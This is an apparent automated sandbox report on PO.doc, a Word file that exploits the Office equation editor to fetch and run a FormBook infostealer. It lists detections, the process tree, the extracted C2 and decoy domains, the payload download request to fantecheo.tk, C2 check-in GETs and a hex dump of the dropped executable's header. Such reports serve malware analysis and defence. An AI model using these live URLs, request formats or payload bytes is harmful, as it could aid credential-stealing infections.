Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO.doc

Overview

General Information

Sample Name:PO.doc
Analysis ID:492582
MD5:601260b52c23f2be80998a22b2fc77dd
SHA1:e4fd634040abd4f6b58aa7efe8fb59f7e64a395f
SHA256:2dfd64c86cfb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 292 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2692 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ibeframnk863.exe (PID: 2800 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
      • ibeframnk863.exe (PID: 2852 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
      • ibeframnk863.exe (PID: 1580 cmdline: C:\Users\user\AppData\Roaming\ibeframnk863.exe MD5: CE20BD8F40F78DA603DD17D756745B0A)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • svchost.exe (PID: 1832 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
          • cmd.exe (PID: 2928 cmdline: /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.ibeframnk863.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.ibeframnk863.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.ibeframnk863.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a39:$sqlite3step: 68 34 1C 7B E1
        • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a68:$sqlite3text: 68 38 2A 90 C5
        • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
        6.2.ibeframnk863.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.ibeframnk863.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 6 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2692, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2692, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\ibeframnk863.exe, CommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ibeframnk863.exe, NewProcessName: C:\Users\user\AppData\Roaming\ibeframnk863.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2692, ProcessCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ProcessId: 2800
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentImage: C:\Users\user\AppData\Roaming\ibeframnk863.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1832

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO.docVirustotal: Detection: 43%Perma Link
          Source: PO.docReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://fantecheo.tk/ibefrankszx.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.handelsbetriebposavec.com/if60/Virustotal: Detection: 8%Perma Link
          Source: http://fantecheo.tk/ibefrankszx.exeVirustotal: Detection: 16%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exeReversingLabs: Detection: 20%
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeReversingLabs: Detection: 20%
          Source: 6.2.ibeframnk863.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: ibeframnk863.exe, svchost.exe
          Source: Binary string: svchost.pdb source: ibeframnk863.exe, 00000006.00000002.505477626.00000000006A1000.00000004.00000020.sdmp
          Source: global trafficDNS query: name: fantecheo.tk
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 99.83.154.118:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 63.250.43.8 80
          Source: C:\Windows\explorer.exeDomain query: www.personowner.guru
          Source: C:\Windows\explorer.exeDomain query: www.audiofactaesthetic.com
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.handelsbetriebposavec.com/if60/
          Source: global trafficHTTP traffic detected: GET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1Host: www.personowner.guruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1Host: www.audiofactaesthetic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 18:42:28 GMTContent-Type: application/x-msdownloadContent-Length: 624640Last-Modified: Tue, 28 Sep 2021 03:45:00 GMTConnection: keep-aliveETag: "61528fbc-98800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 85 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 0a 00 00 00 00 00 00 86 97 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 97 09 00 4f 00 00 00 00 a0 09 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4c 06 00 00 00 a0 09 00 00 08 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 86 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 97 09 00 00 00 00 00 48 00 00 00 02 00 05 00 70 f6 00 00 34 00 03 00 03 00 00 00 a3 01 00 06 a4 f6 03 00 90 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 1d 00 00 0a 2a 3a 02 28 1e 00 00 0a 02 03 7d 1d 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 02 00 00 1b 0a 06 2c 18 28 1f 00 00 0a 02 7b 1d 00 00 0a 06 7b 1d 00 00 0a 6f 20 00 00 0a 2b 01 16 2a 76 20 69 1f 79 45 20 29 55 55 a5 5a 28 1f 00 00 0a 02 7b 1d 00 00 0a 6f 21 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 13 00 00 01 25 16 02 7b 1d 00 00 0a 0a 12 00 12 01 fe 15 04 00 00 1b 07 8c 04 00 00 1b 2d 14 71 04 00 00 1b 0b 12 01 07 8c 04 00 00 1b 2d 04 26 14 2b 0b fe 16 04 00 00 1b 6f 22 00 00 0a a2 28 23 00 00 0a 2a 00 00 00 13 30 03 00 19 00 00 00 03 00 00 11 00 7e 03 00 00 04 03 02 61 20 ff 00 00 00 5f 95 03 1e 64 61 0a 2b 00 06 2a 00 00 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 02 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 02 00 00 04 2a 00 00 13 30 02 00 0e 00 00 00 03 00 00 11 00 02 03 d1 28 0a 00 00 06 0a 2b 00 06 2a 00 00 13 30 03 00 3f 00 00 00 04 00 00 11 00 03 20 ff 00 00 00 5f d2 0a
          Source: global trafficHTTP traffic detected: GET /ibefrankszx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Tue, 28 Sep 2021 18:44:30 GMTtransfer-encoding: chunkedconnection: closeData Raw: 33 31 45 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 69 73 20 62 65 69 6e 67 20 63 72 65 61 74 65 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 